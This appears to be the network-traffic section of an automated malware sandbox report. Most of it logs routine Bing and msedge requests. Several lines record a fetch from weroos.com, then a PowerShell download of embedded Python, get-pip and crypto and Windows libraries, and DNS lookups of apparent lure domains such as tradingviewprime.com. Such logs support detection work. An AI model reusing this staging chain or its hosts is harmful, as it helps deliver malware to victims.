SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /rp/Q0J3WqtOxBbLnp5iTXu__jsZq6o.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /apc/trans.gif?87976b596980857850532fa909f51f1b HTTP/1.1host: b-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
        Source: global trafficHTTP traffic detected: GET /apc/trans.gif?98758aa62564c1822353726be6083611 HTTP/1.1host: b-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
        Source: global trafficHTTP traffic detected: GET /rp/S-1Sin9hxjW1LkijyZiLBA_FHdk.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /rp/TdECMV0TRBVEcANtOCAjiC_gQ1M.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /rp/Uicjz5_Idvl9FRKtwKPHILZoadU.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /apc/trans.gif?62429672578152eea57f84aafc162f64 HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
        Source: global trafficHTTP traffic detected: GET /rp/XUoKWXdZQS2iuOnv0a_-gwXn0RY.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /apc/trans.gif?456f89d19c3134a687f24503b7eb5933 HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
        Source: global trafficHTTP traffic detected: GET /rp/YdkRJN1Cgndw2b5FyfmuFrQJnME.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /r.gif?MonitorID=asgw&rid=f90d9d78e1ee958148fa709861896dba&w3c=true&prot=https:&v=20190506&DATA=[{%22RequestID%22:%22b-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:666,%22T%22:1},{%22RequestID%22:%22b-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:129,%22T%22:1},{%22RequestID%22:%22spo-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:650,%22T%22:1},{%22RequestID%22:%22spo-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:129,%22T%22:1},{%22RequestID%22:%22t-ring-fdv2.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:-1,%22T%22:1}] HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
        Source: global trafficHTTP traffic detected: GET /rp/Z9hYXc38AnqyLF2U6SIx7fPVgp0.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /rp/ZGYsYc-4cfWAUrRQfDPHboO8Xgc.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /SDkwjk.txt HTTP/1.1Host: weroos.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /ftp/python/3.11.8/python-3.11.8-embed-amd64.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.python.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /get-pip.py HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bootstrap.pypa.ioConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /simple/pip/ HTTP/1.1Host: pypi.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: gzip, deflateAccept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01Connection: keep-aliveCache-Control: max-age=0
        Source: global trafficHTTP traffic detected: GET /packages/29/a2/d40fb2460e883eca5199c62cfc2463fd261f760556ae6290f88488c362c0/pip-25.1.1-py3-none-any.whl.metadata HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: */*Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /simple/setuptools/ HTTP/1.1Host: pypi.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: gzip, deflateAccept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01Connection: keep-aliveCache-Control: max-age=0
        Source: global trafficHTTP traffic detected: GET /packages/a3/dc/17031897dae0efacfea57dfd3a82fdd2a2aeb58e0ff71b77b87e44edc772/setuptools-80.9.0-py3-none-any.whl.metadata HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: */*Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /simple/wheel/ HTTP/1.1Host: pypi.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: gzip, deflateAccept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01Connection: keep-aliveCache-Control: max-age=0
        Source: global trafficHTTP traffic detected: GET /packages/0b/2c/87f3254fd8ffd29e4c02732eee68a83a1d3c346ae39bc6822dcbcb697f2b/wheel-0.45.1-py3-none-any.whl.metadata HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: */*Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /packages/29/a2/d40fb2460e883eca5199c62cfc2463fd261f760556ae6290f88488c362c0/pip-25.1.1-py3-none-any.whl HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: */*Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /packages/a3/dc/17031897dae0efacfea57dfd3a82fdd2a2aeb58e0ff71b77b87e44edc772/setuptools-80.9.0-py3-none-any.whl HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: */*Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /packages/0b/2c/87f3254fd8ffd29e4c02732eee68a83a1d3c346ae39bc6822dcbcb697f2b/wheel-0.45.1-py3-none-any.whl HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: */*Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /rp/a2xp3ZIPaHymjkEpVoRLe8IDcCs.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /rp/bW5YZAHlbTlzzS2JT_speOW7v7c.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /simple/pycryptodome/ HTTP/1.1Host: pypi.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: gzip, deflateAccept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01Connection: keep-aliveCache-Control: max-age=0
        Source: global trafficHTTP traffic detected: GET /packages/54/2f/e97a1b8294db0daaa87012c24a7bb714147c7ade7656973fd6c736b484ff/pycryptodome-3.23.0-cp37-abi3-win_amd64.whl.metadata HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: */*Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /simple/pypiwin32/ HTTP/1.1Host: pypi.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: gzip, deflateAccept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01Connection: keep-aliveCache-Control: max-age=0
        Source: global trafficHTTP traffic detected: GET /packages/d0/1b/2f292bbd742e369a100c91faa0483172cd91a1a422a6692055ac920946c5/pypiwin32-223-py3-none-any.whl.metadata HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: */*Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /simple/pywin32/ HTTP/1.1Host: pypi.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: gzip, deflateAccept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01Connection: keep-aliveCache-Control: max-age=0
        Source: global trafficHTTP traffic detected: GET /packages/b3/bd/d1592635992dd8db5bb8ace0551bc3a769de1ac8850200cfa517e72739fb/pywin32-310-cp311-cp311-win_amd64.whl.metadata HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: */*Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /packages/54/2f/e97a1b8294db0daaa87012c24a7bb714147c7ade7656973fd6c736b484ff/pycryptodome-3.23.0-cp37-abi3-win_amd64.whl HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: */*Connection: keep-alive
        Source: global trafficDNS traffic detected: DNS query: flexjjet.com
        Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: lh3.googleusercontent.com
        Source: global trafficDNS traffic detected: DNS query: duckduckgo.com
        Source: global trafficDNS traffic detected: DNS query: improving.duckduckgo.com
        Source: global trafficDNS traffic detected: DNS query: links.duckduckgo.com
        Source: global trafficDNS traffic detected: DNS query: external-content.duckduckgo.com
        Source: global trafficDNS traffic detected: DNS query: tradingviewprime.com
        Source: global trafficDNS traffic detected: DNS query: use.fontawesome.com
        Source: global trafficDNS traffic detected: DNS query: weroos.com
        Source: global trafficDNS traffic detected: DNS query: www.python.org
        Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
        Source: global trafficDNS traffic detected: DNS query: bootstrap.pypa.io
        Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
